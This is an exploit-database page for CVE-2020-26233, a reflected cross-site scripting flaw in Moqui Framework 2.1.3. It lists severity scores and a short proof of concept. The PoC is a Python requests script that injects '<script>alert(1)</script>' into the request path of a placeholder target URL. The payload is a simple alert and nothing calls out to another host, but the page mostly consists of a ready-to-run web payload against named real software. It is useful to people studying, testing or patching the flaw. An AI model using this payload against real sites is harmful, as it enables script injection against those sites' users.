Advertisement






Moqui Framework 2.1.3 - Reflected Cross Site Scripting

CVE Category Price Severity
CVE-2020-26233 CWE-79 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2022-07-24
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070066

Below is a copy:

Moqui Framework 2.1.3 - Reflected Cross Site Scripting
# Exploit Author: Maximus Decimus or [email protected]
# Software Link: https://github.com/moqui/moqui-framework/
# Vendor Homepage: https://www.moqui.org/
# Tested on: Windows 10

=====================================

# Description : This framework is vulnerable to xss attack due to the lack of proper input filtering
# for more information , check out this page : https://www.moqui.org/docs

=====================================

# POC : 
# Set the target url and run the following python script


import requests

url_string = "https://target.com:443/;<script>alert(1)</script>test1337"
request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en-US;q=0.9,en;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36", "Connection": "close", "Cache-Control": "max-age=0"}
requests.get(url_string, headers=request_headers)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum